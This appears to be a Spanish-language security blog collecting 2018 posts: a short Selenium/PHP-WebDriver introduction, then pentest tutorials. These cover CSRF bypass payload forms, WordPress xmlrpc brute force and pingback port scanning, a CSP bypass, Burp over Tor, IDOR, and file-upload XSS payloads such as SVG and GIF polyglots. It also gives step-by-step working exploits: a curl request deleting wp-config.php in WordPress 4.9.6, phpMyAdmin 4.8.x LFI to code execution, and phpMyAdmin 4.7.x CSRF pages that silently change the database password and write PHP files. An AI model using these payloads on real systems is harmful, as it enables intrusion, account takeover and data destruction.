sábado, 29 de septiembre de 2018

Selenium Automatizando el navegador PHP-WebDriver by Facebook

¿Que es Selenium?

Selenium automatiza los navegadores. ¡Eso es! Lo que hagas con ese poder depende totalmente de ti. Principalmente, es para automatizar aplicaciones web con fines de prueba, pero ciertamente no se limita a eso. Las tareas de administracion aburridas basadas en la web pueden (y deberian) ser automatizadas tambien.

Selenium tiene el soporte de algunos de los proveedores mas grandes de navegadores que han tomado (o están tomando) pasos para hacer de Selenium una parte nativa de su navegador. También es la tecnología central en muchas otras herramientas de automatización del navegador, API y frameworks.

¿Que parte de Selenium es apropiada para mi?

Selenium Web Driver

Si quieres:
* Cree robustos paquetes y pruebas de automatizacion de regresion basados en el navegador
* Escalar y distribuir scripts en muchos entornos

Selenium IDE

Si quieres:
* Crear scripts rapidos de reproduccion de errores
* Crear scripts para ayudar en las pruebas exploratorias asistidas por la automatizacion.

Descargar Selenium

Puedes dirigirte a la pagina web de Selenium y en la seccion Download: https://www.seleniumhq.org/download/

Puedes elegir la que mas se adapte a tu proyecto ya sea selenium ide o selenium web driver. En este minitutorial mostraremos algo basico de los dos.


Selenium IDE

En caso de que quieras que sea solamente una accion en especifica siempre la misma accion te recomendaria usar Selenium IDE. El cual se encuentra disponible para firefox y chrome en version complemento, yo utilizare para firefox en este caso:
https://addons.mozilla.org/en-US/firefox/addon/selenium-ide/

En el siguiente vídeo veremos como en Selenium entramos a la pagina de mi BLOG, después entramos a una publicación y después volvemos a la pagina inicial, esto es algo básico ya que con Selenium podemos meter datos en un campo, y muchas cosas mas que normalmente podemos hacer manualmente con el navegador.




También puedes exportar tu código a diferentes partes y hacer mas rápido una ejecución.

Selenium Web Driver

¿Que diferencia hay entre Selenium IDE y Selenium Web Driver?

La mayor diferencia es que con Selenium IDE grabamos las cosas y las reproducimos, pero si quieres que algo sea dinamico y con interaccion debes utilizar programacion y con Selenium Web Driver lo puedes lograr.

Lo primero que debemos realizar es descargarnos el driver de nuestra preferencia se encuentra dentro de la misma pagina oficial de selenium, en mi caso seguire usando firefox:

https://github.com/mozilla/geckodriver/releases

Hay que agregar el driver a variables de entorno.

Y usare tambien el server standalone de selenium en este caso yo utilizare la version 3.8.1:

http://selenium-release.storage.googleapis.com/index.html

Utilizare el driver de PHP creado por facebook:

https://github.com/facebook/php-webdriver

Lo primero a realizar es correr mi server standalone de selenium:




java -jar selenium-server-standalone-3.8.1.jar -enablePassThrough false

Por ultimo podemos correr nuestro proyecto usando la consola o desde web, no explicare el uso del driver ya que facebook tiene una gran wiki aqui: https://github.com/facebook/php-webdriver/wiki




Por ultimo decirles que con Selenium tenemos una herramienta poderosa para automatizacion de tareas y podriamos hacer cosas grandiosas con el. Un ejemplo:



facebook from Ikizler Kadioglu on Vimeo.


Por esta introduccion seria todo y les invito a probar Selenium en sus proyectos de automatizacion.

Saltar CSRF Referer en Blanco

Este resumen no está disponible. Haz clic en este enlace para ver la entrada.

Saltando CSRF



Cross site request forgery (CSRF) estan diseñados para enviar que un FORM POST oculto en maligno.com sea enviado en secreto para secuestrar su cuenta en ejemplo.com. Los sitios web como Facebook implementan esto utilizando algo llamado "fb_dtsg" con la solicitud, y el proposito general es que solo puede realizar una accion (como actualizar su correo electronico) si se envia un valor valido de "fb_dtsg" con la solicitud. A menos que el atacante tenga XSS, ningun atacante puede obtener este valor unico y falsificar una solicitud cuando visita su sitio malicioso. En este tutorial voy a describir un bypass interesante que encontre, asi como las cosas que tambien puedes probar.

El sitio tiene un token CSRF... no es vulnerable - piénselo de nuevo

Un programa de recompensas tenia tokens CSRF en todas sus solicitudes. Literalmente, cada accion que realizaba se enviaba con un token CSRF. El bypass fue en realidad extremadamente simple, uso de clickjacking.

Si, por ejemplo, estaba actualizando el correo electronico de mi cuenta y modifico la solicitud para enviar un valor CSRF en blanco, reflejaria los cambios que queria hacer pero con error: CSRF_token no es valido. Por favor, vuelva enviarlo... el correo electronico no se habia actualizado exitosamente, pero habia sido reflejado en la pagina.

Gracias a la falta de X-FRAME-OPTIONS, pude enviar la solicitud para actualizar el correo electronico, luego anote el resultado "haga clic en el usuario" para hacer clic "enviar". Bingo, esa cuenta ahora es mia!.

Otras formas comunes de eludir tokens CSRF

Token CSRF en blanco

Extremadamente simple, solo intente enviar un valor CSRF en blanco y vera si validan del lado del servidor. No se olvide de ver tambien si los cambios que intento realizar se reflejan en la pagina. ¡Combine esto con clickjack y tendra un problema potencial de CSRF en todo el sitio!

Compartiendo tokens CSRF

He tenido casos en los que mientras la sesion de los usuarios es valida, el token CSRF de los usuarios se puede compartir en cualquier otra cuenta. Cree dos cuentas y vea si puede compartir tokens csrf entre las mismas.

Cambiar un caracter

A veces, un sitio solo verificara la longitud de un token CSRF (tonto, lose). Intente cambiar un caracter (para que tenga la misma longitud) y vea que sucede. Te sorprenderias.

Usando archivos .swf

@avlidienbrunn hizo un gran informe sobre el uso de archivos .swf para CSRF: https://hackerone.com/reports/44146

¿Puedes usar CSRF en JSON y XML?

Claro que se puede, esto podria requerir un poco de juego, ya que aveces tienes que usar el caracter '=' en algun lugar, A continuacion se muestra como realizar para XML:

<html>
 <body>
    <form ENCTYPE="text/plain" action="http://sitiovulnerable/prueba.php" method="post"> 
    <input type="hidden" name="<foo> <html xmlns:html='http://www.w3.org/1999/xhtml'> <html:script>alert(1);</html:script> </html> </foo>">
     <input type="submit" value="submit"> </form>
 </body>

</html>

Y en JSON (este ejemplo exporta una lista de contactos)

<html>
 <body>
    <form ENCTYPE="text/plain" action="http://vulnsite.com/snip/snippet.php" method="post"> 
    <input type="hidden" name="{"params":{"limit":20,"and":false,"filters":[],"excluded_contacts":[]},"fields":["First Name","Last Name","Email Address","Title","Notes","Organization","Street","City","State","Tags","Zip Code","Phone Number","Gender","Event ID","Event Title","VIP","Twitter Handle","Twitter URL","Twitter Followers","Twitter Following","Facebook Name","Facebook URL","Facebook Friends","Instagram Handle","Instagram URL","Instagram Followers","Instagram Following","Website","Date Added","Unsubscribed"],"recipient":"myemail+2" value='@gmail.com'>
     <input type="submit" value="submit"> </form>
 </body>

</html>


Observe como se esta utilizando el "=" en el parametro de correo electronico, gracias a la forma en que funciona Google Mail, un correo electronico enviado a myemail+2=@gmail.com ira a myemail@gmail.com.

Proteccion CSRF a traves de Referer

He visto sitios que verifican si el Referer es su sitio y si es = a su sitio entonces permiten la solicitud. Si no es = entonces bloquean la solicitud. Un enfoque interesante para detener los ataques CSRF, como podemos evitar esto es usando la siguiente manera:

* https://tusitio.com/https://www.elsitiovulnerable.com/

Algunos sitios solo comprueban si CONTIENE la URL de su sitio web, lo que significa que solo podemos crear una carpeta en nuestro sitio para enviar la solicitud CSRF.

* Enviar un Referer en Blanco
Enviar un formulario dentro de un iframe realmente le dara un Referer en blanco. A veces esto es suficiente para pasar por alto su proteccion.

Probablemente haya algunas cosas que me falten, o quizas tenga un concepto interesante para evitar el CSRF. Si es asi, no dude comunicarse conmigo y lo agregare aqui. Happy Hacking.

Wordpress xmlrpc.php: vulnerabilidades comunes y como explotarlas

¿De que se trata este post?

Es posible que haya visto un archivo xmlrpc.php en muchos sitios de Wordpress que visite, incluso que haya intentado buscar el error (el servidor XML-RPC solo acepta solicitudes POST) que aparece cuando visita http://sitio.com/wp/xmlrpc.php. En esta publicacion, intentare resaltar las vulnerabilidades comunes asociadas con el archivo xmlrpc.php.

¿Que es XML-RPC?

XML-RPC en Wordpress es en realidad una API o "interfaz de programa de aplicacion". Ofrece a los desarrolladores que crean aplicaciones moviles, aplicaciones de escritorio y otros servicios la capacidad de comunicarse con su sitio de Wordpress. La API XML-RPC que ofrece Wordpress les brinda a los desarrolladores una manera de escribir aplicaciones (para usted) que puedan hacer muchas de las cosas que puede hacer cuando inicia sesion en WordPress a traves de la interfaz web. Estas incluyen:

* Publicar una entrada
* Editar una publicacion
* Eliminar una publicacion
* Subir un nuevo archivo (por ejemplo, una imagen para una publicacion)
* Obtener una lista de comentarios
* Editar comentarios

Vulnerabilidades comunes en XML-RPC

Las principales debilidades asociadas con XML-RPC son: Ataques de fuerza bruta: los atacantes intentan iniciar sesion en WordPress utilizando xmlrpc.php.
Veamos como se hace realmente y como podria aprovechar esto mientras intenta probar un sitio de wordpress para detectar posibles vulnerabilidades.

Ataque de fuerza bruta

1.- Esto es lo que ve originalmente cuando intenta abrir xmlrpc.php ubicado en http://<tusitio.com>/<directoriowordpress>/xmlrpc.php




2.- Lo primero que debe hacer ahora es enviar una solicitud POST y enumerar todos los metodos disponibles, ¿por que? por que asi sabremos que acciones son posibles realizar y potencialmente usar una de ellas para un ataque. Para enumerar todos los metodos envie una solicitud POST con los siguientes datos, como se muestra en la imagen, obtendra una respuesta con todos los metodos disponibes.

<methodCall> 
<methodName> system.listMethods </methodName> 
<params> </params> 
</methodCall>



3.- Busque lo siguiente, si encuentra que estan disponibles, entonces podemos proceder con el ataque:

* wp.getUserBlogs
* wp.getCategories
* metaWeblog.getUsersBlogs

NOTA: hay algunos metodos mas, pero estos son los mas comunmente disponibles. Los he tratado antes, solo mencionando los que puedo recordar en este momento.

4.- Ahora, para realizar un ataque de fuerza bruta, envie lo siguiente en la solicitud POST, si conoce algun nombre de usuario valido que seria aun mejor, recomiendo usar wp-scan para encontrar una lista de nombres de usuarios validos, casi siempre las compañias no intentan evitar la enumeracion de nombre de usuarios de los sitios wordpress.

<methodCall> 
<methodName> wp.getUsersBlogs </methodName> 
<params> 
<param><value>admin</value> </param> 
<param><value>pass</value> </param> 
</params> 
</methodCall>



5.- Ahora cargamos intruder con Burp suite para realizar una ataque por fuerza bruta: https://arthusu.blogspot.com/2015/01/concepto-ataque-por-fuerza-bruta.html

Cuando obtenga un respuesta correcta tendra un 200OK o en funcion del tamaño de la respuesta, el inicio de sesion se mostrara correcto.


¿Otros Ataques?


XSPA o simplemente escaneo de puerto!

1.- Enumere todos los metodos y busque el siguiente:

'pingback.ping'

2.- Si lograste encontrar la cadena pingback.ping entonces continuemos e intentemos obtener un ping en nuestro servidor, puede usar netcat, apache, nodejs, etc. Inicie su servidor y envie la siguiente solicitud en los datos de la publicacion:

<methodCall> 
<methodName> pingback.ping </methodName> 
<params> <param> 
<value> <string> http://sitioaescanear.com.mx:8080 </string> </value> 
</param> <param> <value> <string>http://tusitio.com/wp/?p=1 </string> 
</value></param> </params> 
</methodCall>

Hay 2 cosas que deben llenarse aqui:
1) El enlace de su servidor
2) El enlace de alguna publicacion valida del sitio de wordpress que se usa para devolver la llamada al ping




en la respuesta, si obtiene faultCode y un valor mayor que 0 (<value><int>17</int></value>), significa que el puerto esta abierto + puede verificarlo revisando los registros del servidor.




lunes, 17 de septiembre de 2018

Como saltar CSP (Content Security Policy)

Introduccion

La política de seguridad de contenido (CSP) es un estándar de seguridad informática introducido para evitar la secuencia de comandos (XSS), clickjacking y otros ataques de inyección de código resultantes de la ejecución de código malicioso en el contexto confiable de la pagina web.

Detectando CSP




Primeramente vemos una URL que puede ser posiblemente atacada por XSS. Y hacemos la prueba:




Vemos como se inyecta nuestro codigo pero no se ejecuta entonces, vamos al apartado de Network de nuestro inspeccionador de elementos y vemos lo siguiente:



Un mensaje de error que nos indica claramente como content security police nos esta bloqueando y que solo permite ejecutar scripts del mismo dominio.

Atacar!

El siguiente paso es buscar alguna parte donde se refleje nuestro XSS ya sea un alert, prompt, confirm, etc... puede llegar a ser una imagen, un archivo js, etc...

Primero hay que ver cuales son los dominios que permite para ello vamos hacemos una peticion y vemos la respuesta:




Vemos claramente como se puede solamente inyectar script que sean del mismo dominio. Ejemplo de un vector:

<script src="http://pentesterlab.com/arthusublog.js?var=alert(1);" />

Donde alert(1) se refleja en el JS.




Inyectando el vector en donde se encuentra el XSS podemos realizar el bypass:




Dork: site:example.com inurl:callback


Usando Burp con TOR

Buenas amigos esto es algo fácil de hacer así que espero hacerlo por pasos y si agregar unas cuantas imágenes.


1.- descargamos TOR: https://www.torproject.org/
2.- abrimos el navegador de tor vamos a opciones>proxy de red>Configuración... Verificamos el HOST SOCK en mi caso esta así: IP: 127.0.0.1 PUERTO: 9150

3.- ahora abro mozilla firefox e ingreso lo siguiente:

4.- Me dirijo a Burp>User options>SOCKS Proxy>Ingreso proxy:
IP: 127.0.0.1 PORT: 9150

Seleccionamos la opción: Use SOCKS Proxy y tambien Do DNS Lookups over Sock Proxy.


5.- Ingreso a Mi firefox y hago peticiones por ejemplo https://www.cual-es-mi-ip.net/:


Listo tenemos configurado TOR para usar con BURP.


sábado, 15 de septiembre de 2018

IDOR: Referencia insegura de objeto directo

Es una vulnerabilidad que generalmente conduce a la perdida de datos confidenciales, pero también puede dar lugar a una menor modificación de los datos.

Considere una URL como: http://idor.ejemplo.com/perfil?UID=24 que devuelve una pagina como:

Nombre: JuakersinContraseña: C0ntr4señ4123


Ahora imagine que se conecta al sistema con su cuenta, y cambiamos esa URL por lo siguiente: http://idor.ejemplo.com/perfil?UID=26

Nombre: Chico MaloContraseña: g0d


¡Esa es la referencia inseguro de objeto directo! simplemente se cambio un parámetro y pudo acceder a datos que no debería, es tan simple como eso. Creo que es una vulnerabilidad que muy a menudo se pasa por alto, ya que el parámetro no tiene que ser tan obvio como este ejemplo, y otro es por que los escaneres automáticos no son nada buenos para detectar este tipo de problema ya que necesariamente tendrían que tener inteligencia para poder darse cuenta que los datos que esta arrojando no deberían de ser accesibles.

Sin embargo el impacto no solo se da en perdida de datos confidenciales, considere también URLs como:

http://idor.ejemplo.com/cambiarContrasena?userID=793

http://idor.ejemplo.com/eliminarCuenta?userID=793

¡Aquí podría obtener el control de la cuenta y ademas perdida de información! Una vulnerabilidad bastante simple que se basa simplemente en una cantidad insuficiente de autenticacion. 

Donde los permisos del usuario no se validan, antes de que se sirvan los datos.

domingo, 9 de septiembre de 2018

XSS al subir archivos

Un input para cargar archivos es una gran oportunidad para realizar ataques XSS. El área restringida de un usuario como cargar una imagen de perfil es una gran oportunidad, y nos brinda el poder realizar este ataque por fallo del programador. Básicamente podríamos tener los siguientes ataques.

1) Cambiar el nombre del archivo

El nombre del archivo en si puede estar reflejado o persistente en una pagina, por lo cual se trata solamente de nombrar el archivo.


"><img src=X onerror="alert(document.domain)">.png

Es recomendable utilizar un sistema linux para este tipo de ataques.

Pueden probar con w3schools ya que es vulnerable a este ataque: https://www.w3schools.com/jsref/tryit.asp?filename=tryjsref_fileupload_value


2) Metadatos

Usando exiftool es posible alterar los metadatos que puedan llevar una ataque xss reflejado en alguna parte.

Syntax:  exiftool [OPTIONS] FILE

Ejemplo: exiftool -make='<script>alert(/xss/)</script>' FILE



3) Contenido

Si la aplicación le permite la carga de un archivo SVG (que también es un tipo de imagen), se puede usar un archivo con el siguiente contenido para ejecutar un XSS:

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>


4) Fuente

Es fácil crear una imagen GIF que lleve un payload javascript para utilizarlo como fuente en algún script. Esto es útil para eludir el CSP (La cabecera de política de seguridad de contenido) "script src 'self'" (que no permite <script>alert(1)</script> por ejemplo), si podemos inyectar con éxito en el mismo dominio, como se muestra a continuación.

Para crear una imagen de este tipo simplemente utilícela como contenido y guárdela con la extensión .gif

GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;


La firma de un archivo GIF, GIF89a se usa como una variable de javascript asignada a la función de alerta. Sin embargo, entre ellos hay un vector XSS comentado en caso de que la imagen se pueda recuperar como un MIME de texto/HTML, permitiendo así la ejecución de un payload simplemente solicitando el archivo.

Como también podemos ver a continuación, el comando similar al de UNIX junto a las funciones de PHP exif_imagetype() y getimagesize() lo reconocen como un archivo GIF. Por lo tanto, si una aplicación esta usando solo esto para validar la imagen, el archivo se cargara (pero puede desinfectarse mas adelante).


Para mas tipos de archivos que tienen su propia firma para la asignación de un javascript puede verificar esto: https://en.wikipedia.org/wiki/List_of_file_signatures

Hay ejemplo mas elaborados que usan archivos de imagen, generalmente omitiendo filtros como los de la biblioteca GD. Un ejemplo:
https://github.com/d0lph1n98/Defeating-PHP-GD-imagecreatefromgif

Traducido por Arthusu
Entrada creada en Brute Logic: https://brutelogic.com.br/blog/file-upload-xss/

Exploit Wordpress 4.9.6 - Eliminación de archivos arbitrarios

Hola en el 2013 publique una entrada sobre eliminación de archivos arbitrarios y les traigo un exploit en wordpress y como puede ser explotado, si quieres una explicación de como funciona esta vulnerabilidad les dejo el enlace de mi entrada anterior:
https://arthusu.blogspot.com/2013/07/eliminacion-de-archivos-arbitrarios.html

Intro

Wordpress es el CMS mas popular segun w3techs:
https://w3techs.com/technologies/overview/content_management/all

RIPS revelo esta vulnerabilidad el 26 de junio del 2018:
https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/

Explotando la vulnerabilidad de eliminación de archivos arbitrarios

1.- Iniciamos sesion

2.- Nos dirigimos a agregar una nueva imagen y la subimos

3.- Damos clic en la imagen y establecemos $meta['thumb'] (datos en la meta data de la imagen), recordemos el id de la imagen que se muestra arriba de la URL, como se muestra a continuación:

4.- Nos dirigimos a la url con el post http://localhost/wp-admin/post.php?post=4&action=edit y buscamos _wpnonce usando inspeccionar codigo>ctrl+f


5.- Enviamos nuestro vector de ataque usando cURL:


curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'

donde *** es tu valor de la cookie y *** en _wpnonce es tu identificador que recogiste al inspeccionar el HTML.

7.- Lanzamos el ataque, buscamos de nuevo _wpnonce en el código fuente estando en: http://localhost/wp-admin/post.php?post=4&action=edit copiamos el identificador de _wpnonce y ejecutamos nuestro payload que eliminara el archivo deseado:


8.- Recargamos la pagina y el archivo ha sido eliminado.

Y es todo, espero que les haya gustado, saludos!

Exploit phpMyAdmin 4.8.x LFI

Este exploit no requiere root pero tenemos que tener sesión iniciada en phpMyAdmin.

1.- Nos dirigimos a phpMyAdmin e iniciamos sesión.
2.- La version que estoy ejecutando actualmente es la 4.8.1

3.- Vamos a la pestaña SQL y ejecutamos la siguiente consulta: select '<?php phpinfo();exit;?>';

4.- Obtenemos la sesión (02sg7d31vi7pd23f4p45iv14jim83hob en este caso) de phpMyAdmin, en este caso estoy usando el complemento editThisCookie, pero también puede verlo desde la pestaña Application.

5.- Hacemos la peticion al archivo de la sesion por medio de LFI:

http://localhost/phpmyadmin/index.php?target=db_sql.php?/../../../../../../../../var/lib/php/sessions/sess_02sg7d31vi7pd23f4p45iv14jim83hob

En este caso navegamos hasta /var/lib/sessions/ que es donde se encuentran las sesiones
Y sess_tuidentificador

Y vuala:



Esto seria todo, lo mas complicado es encontrar el directorio donde se encuentran las sesiones guardadas y en todo si caso si es que las guarda, saludos!

Exploit phpMyAdmin 4.7.x CSRF

phpMyAdmin como sabemos es una herramienta de gestión de bases de datos MySQL/MariaDB en linea, el equipo de phpMyAdmin ya corrigio esta vulnerabilidad CSRF por lo cual es importante que si tienen esta versión en su equipo la actualicen.

Un atacante puede acceder a la pagina mediante la inducción del administrador, ejecutando en silencio cualquier consulta SQL.

El administrador inicia sesion con phpMyAdmin, digamos que el usuario es root y la contraseña es toor.



1.- Explotación de CSRF - Cambiando la contraseña actual del administrador de la base de datos

Sabemos que si quisiéramos modificar algún contenido de la base de datos tendríamos que saber la tabla la columna y la base de datos algo que no siempre sabríamos y limitaría nuestro ataque, es por eso que usaremos este ejemplo que es mas general. La consulta para cambiar la contraseña del usuario es la siguiente:

SET password=PASSWORD('www.arthusu.blogpost.com');

2.- Crear una pagina con código malicioso

<p>Mi primera pagina web</p>
<img src="http://localhost/phpmyadmin/sql.php?db=mysql&table=user&sql_query=SET password=PASSWORD('www.arthusu.blogpost.com')" style="display:none;" />



Al pasarle esto al administrador de phpMyAdmin su contraseña sera actualizada y ahora nosotros podremos acceder desde phpMyAdmin.

3.- Escribir un archivo en el servidor.

MySQL permite escribir los resultados de una consulta en un archivo, por lo cual podemos utilizar la siguiente consulta:

select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';


Donde /var/www/html - es una ruta existente en la cual se puede escribir archivos tiene esos permisos

El exploit quedaría algo como lo siguiente:

<p>Mi primera pagina web</p>

<img src="http://localhost/phpmyadmin/sql.php?db=mysql&table=user&sql_query=select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';" style="display:none;" />

Y el resultado seria:



La ejecución de nuestro código.

Existen otras consultas que podemos realizar como es la lectura de archivos usando load_file, y lo que se nos ocurra con consultas SQL.

Conclusión

Mantenerte actualizado, y ver que los ataques CSRF pueden llegar a ser peligrosos. También comentar que este ataque solo sirve si un dba tiene sesión iniciada en phpMyAdmin y si es dba.


sábado, 8 de septiembre de 2018

Links utiles y herramientas utiles para pentest

Aqui hare una lista y la ire actualizando cuando encuentre herramientas utiles online para pentest:


1.- https://www.robtex.com/ <- Informacion sobre una URL
2.- https://toolbox.googleapps.com/apps/dig <- Dig Google
3.- http://index.commoncrawl.org/ <- Crawling URLS y algunos subdominios guardados
4.- https://archive.org/index.php <- archivo de paginas web antiguas
5.- https://whois.arin.net/ui/query.do <- recoleccion de informacion, solo hay que escribir el nombre en el campo, ej: facebook
6.- https://www.ripe.net/ <- informacion de sitio web y whois de bases de datos
7.- https://bgp.he.net/cc <- informacion sobre sitios web la red, etc
8.- https://www.shodan.io/ <- Escaneo de puertos ip, cabeceras y mas
9.- https://haveibeenpwned.com/ <- verificar emails hackeados
10.- http://osintframework.com/ <- recoleccion de informacion de personas
11.- https://www.exploit-db.com/ <- base de datos de exploits
12.- http://whois.domaintools.com/ <- informacion de WHOIS
13.- https://psbdmp.ws/ <- Pastebin Leaks
14.- https://builtwith.com/ <- tecnologia que usan los sitios
15.- https://securityheaders.com/ <- Verificar seguridad en las cabeceras de sitios web
16.- https://hunter.io/ <- busqueda de emails en alguna pagina tiene cuenta gratis y servicio de paga
17.- https://www.get-metadata.com/ <- metadata en archivos
18.- https://urlscan.io/ <- escanea sitio web en busca de malware tambien sirve virus total
19.- https://hackvertor.co.uk/public <- varias utilidades para obfuscacion o encriptar o desencriptar
20.- https://www.crunchbase.com/ <- buscar por adquisicion reciente de alguna compañia